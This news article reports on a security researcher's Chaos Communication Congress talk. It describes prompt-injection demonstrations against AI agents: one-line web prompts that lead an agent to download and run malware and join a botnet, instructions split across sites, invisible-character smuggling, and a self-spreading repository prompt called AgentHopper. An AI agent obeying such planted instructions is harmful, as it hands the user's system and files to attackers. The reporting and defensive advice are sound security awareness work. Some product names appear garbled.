Downloaded, opened, destroyed. How AI agents like Claude and Copilot hand over your computer to hackers without your knowledge.
Just one invisible line of text is enough to turn your device into a cyberweapon.
Just one invisible line of text is enough to turn your device into a cyberweapon.
A new warning regarding threats associated with using AI agents was issued at the recent Chaos Communication Congress in Germany. According to cybersecurity specialist Johann Reberger, a computer with an installed system like Claude Code, GitHub Copilot, Google Jules, or similar solutions instantly becomes vulnerable to attacks that do not require user participation. Just one line on a webpage or in a document is enough for the agent to receive malicious instructions.
According to the demonstrations presented, AI assistants are particularly susceptible to attacks through command injection into ordinary text prompts. One example was a website containing a single phrase asking to download a file. Claude, which uses a computer interaction tool, not only downloaded it but also automatically made it executable, launched a terminal, and connected the device to a botnet. Performing these actions did not even require any keystrokes from the user.
Reberger emphasized that machine learning models have significant capabilities but are extremely vulnerable in the presence of a malicious actor. He also noted that major companies like Anthropic do not fix the vulnerabilities in the agents' operational logic themselves, as they are inherent in the system architecture. Devices where AI tools are enabled should be considered already compromised, especially if the agents have access to computer management functions.
During the presentation, a whole range of scenarios in which agents execute malicious commands was demonstrated. One involved infection via split instructions placed on different websites. Specifically, the AI assistant Devin, receiving partial commands from two sources, deployed a web server, opened access to user files, and sent a link to the attacker.
Reberger also demonstrated a method for injecting invisible text using the ASCII Smuggler tool. Such characters are impossible to notice in most editors, but AI agents interpret them as commands. As a result, Google Jules and Antigravity executed instructions, downloaded malware, and opened remote access to the system.
According to Reberger, the new Gemini 2.0 model is particularly effective at recognizing hidden characters, and this applies to all applications built on it. Even local agents like Anthropic Cloud Code or Amazon Developer can execute system commands, which provides an opportunity to bypass protection and gain access to confidential information.
The concept of an AI virus called AgentHopper was also presented. It spreads not through code, but through the interaction of AI agents. A malicious prompt is embedded into a repository, after which agents copy it into other projects and pass it on. The same prompt can adapt to a specific AI assistant using conditional operators.
Reberger mentioned that he used Gemini to create this virus model, noting how much easier writing malware has become with modern AI tools.
In conclusion, the expert advised never to trust the output of language models and to minimize agents' access to system resources. He called containerization, for example via Docker, an ideal solution, as well as a complete ban on the automatic execution of commands.
According to Reberger, AI tool providers openly admit they cannot guarantee the security of their products. Therefore, the main takeaway is that one should always operate under the assumption that the system could be compromised.
